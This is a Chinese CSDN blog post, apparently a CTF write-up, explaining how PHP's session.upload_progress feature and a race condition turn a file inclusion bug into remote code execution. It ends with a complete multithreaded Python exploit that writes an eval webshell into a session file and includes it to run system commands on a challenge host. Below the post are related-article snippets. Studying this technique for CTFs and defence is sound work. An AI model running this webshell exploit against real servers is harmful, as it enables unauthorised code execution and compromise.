文件包含漏洞奇技淫巧——session.upload_progress

于 2023-09-03 15:50:43 发布
阅读量151 收藏 1
点赞数 1
文章标签: 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YV_LING/article/details/132651177
版权

文件包含漏洞奇技淫巧——session.upload_progress

刷题时遇到的一道题目,一直没有思路,看完wp之后学会的新姿势。

知识铺垫

php5.4之后新增了一个功能:session.upload_progress

php.ini有以下几个默认选项

session.upload_progress.enabled = on
session.upload_progress.cleanup = on
session.upload_progress.prefix = "upload_progress_"
session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
session.upload_progress.freq = "1%"
session.upload_progress.min_freq = "1"

其中:

  • enabled=on表示upload_progress功能启用,当上传文件时,php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中;
  • cleanup=on表示当文件上传结束后,php将会立即清空对应session文件中的内容;
  • name出现在表单中时,php会报告上传进度,最重要的是:name的值可控
  • prefix为key前缀,它和name拼接后作为session中的键名。

存储机制

当开启session时,服务器都会在一个临时目录下创建一个session文件来保存会话信息,文件名格式为 sess_PHPSESSID 。

Linux中,session文件一般保存在以下目录:

/var/lib/php/
/var/lib/php/sessions/
/tmp/
/tmp/sessions/

利用方式

根据上述session的配置和机制,可以想到:通过session.upload_progress将恶意代码写入session文件,再通过inclue实现rce。

难点一

在php中,只有调用了session_start()才能开启session,那么在没有使用session_start()时,如何开启session?

默认情况下,php配置中的session.use_strict_mode是未启用的,也就意味着cookie中的PHPSESSID是可以自定义的。例如:

当设置PHPSESSID=yvling时,服务器会生成一个sess_yvling的session文件并保存在临时目录下,此时php自动初始化session,产生一个键值对,键名为配置文件中设置的prefix+name

难点二

默认情况下,session.upload_progress.cleanup是启用的, 也就意味着在上传结束后,session文件中有关文件上传的信息会被马上删除,那么怎么才能将恶意代码包含至文件中呢?

这里使用条件竞争的方式,使用脚本不断发送上传数据包,再用相同方式发送文件包含的数据包,就能包含到了。

Exp

import io
import sys
import requests
import threading


sessid = "yvling"
data = { "cmd":"system('ls /');" }
url = "http://node5.anna.nssctf.cn:28960/index.php"
params = "QAQ"
cahce = "/tmp"
filename = "yvling.txt"

def write(session):
    while True:
        f = io.BytesIO(b"a" * 1024 * 50)
        resp = session.post(
            url=url, 
            data={
                "PHP_SESSION_UPLOAD_PROGRESS": "<?php eval($_POST['cmd']);?>"
            }, 
            files={
                "file": (filename, f)
            }, 
            cookies={
                "PHPSESSID": sessid
            } 
        )


def read(session):
    while True:
        resp = session.post(url=f"{url}?{params}={cahce}/sess_{sessid}", data=data)
        if filename in resp.text:
            print(resp.text)
            event.clear()
            sys.exit(0)
        else:
            # print("retry...")
            pass


if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30): 
            threading.Thread(target=write,args=(session,)).start()
        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()
YV_LING
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Python 语言有什么奇技淫巧吗?.docx
07-23
Python 语言有什么奇技淫巧吗?.docxPython 语言有什么奇技淫巧吗?.docxPython 语言有什么奇技淫巧吗?.docxPython 语言有什么奇技淫巧吗?.docxPython 语言有什么奇技淫巧吗?.docxPython 语言有什么奇技淫巧吗?....
利用PHP_SESSION_UPLOAD_PROGRESS上传webshell
god_Zeo的安全博客
09-24 760
0x01 环境配置&利用条件 环境分析 session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的 我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag session.upload_progress.prefix由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。 所以: 这个文件名是PHPSESSID=flag,文件名
php-session文件包含和反序列化(对session.upload_progress的利用)
unexpectedthing的博客
02-11 1608
文章目录前言session的简介PHPsession的存储方式php.ini中的一些配置php中的session.upload_progress文件包含反序列化$_SESSION变量直接可控$_SESSION变量不可控参考链接 前言 本文是利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含和反序列化的总结。 也就是关于php-session文件包含和反序列化 session的简介 session被称为“会话控制”,Session 对象存储特定用户会话所需的属性及配置信息。这样,当用
session.upload_progress文件包含漏洞
leekos的博客,分享web安全相关知识~
06-02 556
之前学习了该漏洞,但是没有做笔记,导致容易遗忘。在此用一个题目来理解漏洞以下是session.upload_progress.enabled可以控制是否开启session.upload_progress功能session.upload_progress.cleanup可以控制是否在上传之后删除文件内容session.upload_progress.prefix可以设置上传文件内容中的前缀session.upload_progress.name的值即为session中的键值。
php上传完没进度条_php如何实现上传进度条
weixin_29027305的博客
03-08 134
php实现上传进度条的方法:首先向服务器端上传一个文件;然后用PHP将此次文件上传的详细信息存储在session当中;接着用Ajax周期性的请求一个服务器端脚本;最后通过浏览器端的Javascript显示更新进度条即可。实现文件上传进度条基本是依靠JS插件或HTML5的File API来完成,其实PHP配合ajax也能实现此功能。PHP手册对于session上传进度是这么介绍的:当 session...
php7 uploadprogress,PHP基于session.upload_progress 实现文件上传进度显示功能详解
weixin_30209891的博客
03-12 279
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下:介绍session.upload_progressPHP5.4的新特征。当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以...
awesome-blackmagic::performing_arts::heart_suit:奇技淫巧:diamond_with_a_dot:黑魔法大集合:diamond_suit::club_suit:
01-31
awesome-blackmagic::performing_arts::heart_suit:奇技淫巧:diamond_with_a_dot:黑魔法大集合:diamond_suit::club_suit:
Git的奇技淫巧.zip
08-03
Git是一个 “分布式版本管理工具”,简单的理解版本管理工具:大家在写东西的时候都用过 “回撤” 这个 功能,但是回撤只能回撤几步,假如想要找回我三天之前的修改,光用 “回撤” 是找不回来的。...
来自小密圈里的那些奇技淫巧.pdf
08-08
EVAL长度限制突破技巧 命令长度限制突破技巧 Mysql突破换行符的技巧 命令执行WAF绕过技巧 无字母数字Webshell构造技巧
记一次PHP_SESSION_UPLOAD_PROGRESS的本地文件包含
末初的CSDN博客
05-07 914
来源于今天一位朋友给的题目,叫我帮忙看看 题目名字是有提示LFI,这个登录框测试了一下发现输入什么都是返回一样,也没有有注入的迹象,url很明显可能存在LFI,尝试下读取logo.php /?page=php://filter/convert.base64-encode/resource=login.php 有过滤,简单fuzz了下发现过滤了如下 base、file、http、ftp、phar、gopher、data、zip、read、rot、string、decode、flag、..... 但.
PHP基于session.upload_progress 实现文件上传进度显示功能详解
10-16
主要介绍了PHP基于session.upload_progress 实现文件上传进度显示功能,结合实例形式分析了php5.4版本session.upload_progress特性实现文件上传进度显示的相关操作技巧,需要的朋友可以参考下
session.upload_progress文件包含
Aiwin的博客
05-29 797
session.upload_progress文件包含
session.upload_progress进行文件包含和反序列化学习
snowlyzz的博客
09-07 443
利用session.upload_progress进行文件包含
PHP中的Session Upload Progress 设置问题
超人学飞的日子
07-06 1900
在写CTF题目的时候遇到了session反序列化的漏洞,需要通过Session Upload Progress来写入seession的值。在本地测试时遇到了些问题:fool1.php:&lt;?phpini_set('session.serialize_handler', 'php_serialize');session_start();//$_SESSION['ryat'] = $_GET['r...
[CTFSHOW]利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含
Y4tacker的博客
11-02 2148
文章目录代码审计脚本参考文章 代码审计 考点是:利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含 通过观察代码,可以看到过滤了大部分的文件包含函数,这里我们利用PHP_SESSION_UPLOAD_PROGRESS加条件竞争进行文件包含,具体原理可以看看下面这篇参考文章 <?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file);
php+uploadprogress实现上传进度功能
bjx18356163055的博客
02-13 1478
文件上传进度反馈, 这个需求在当前是越来越普遍, 比如大附件邮件. 在PHP5.4以前, 我们可以通过APC提供的功能来实现. 或者使用PECL扩展uploadprogress来实现. 虽然说, 它们能很好的解决现在的问题, 但是也有很明显的不足: § 1. 他们都需要额外安装(我们并没有打算把APC加入PHP5.4) § 2. 它们都使用本地机制来存储这些信息, APC使用共享内存, 而u
浅谈PHP_SESSION_UPLOAD_PROGRESS和条件竞争的巧妙利用
qq_52737372的博客
07-20 912
前些阵子CISCN
上传进度支持(Upload progress in sessions)
10-19 1172
作者: Laruence 本文地址: http://www.laruence.com/2011/10/10/2217.html 文件上传进度反馈, 这个需求在当前是越来越普遍, 比如大附件邮件. 在PHP5.4以前, 我们可以通过APC提供的功能来实现. 或者使用PECL扩展uploadprogress来实现. 虽然说, 它们能很好的解决现在的问题, 但是也有很明显的不足:
mingyitianxia
最新发布
07-28
很抱歉,我无法理解你的问题"mingyitianxia"。请提供更多的信息或者明确你的问题,我将尽力帮助你。 #### 引用[.reference_title] - *1* [Elasticsearch 预处理没有奇技淫巧,请先用好这一招!](https://blog.csdn.net/wojiushiwo987/article/details/107328606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Elasticsearch 多字段查询 best_fields、most_fields、cross_fields,傻傻分不清楚?](https://blog.csdn.net/wojiushiwo987/article/details/111412721)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YV_LING

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值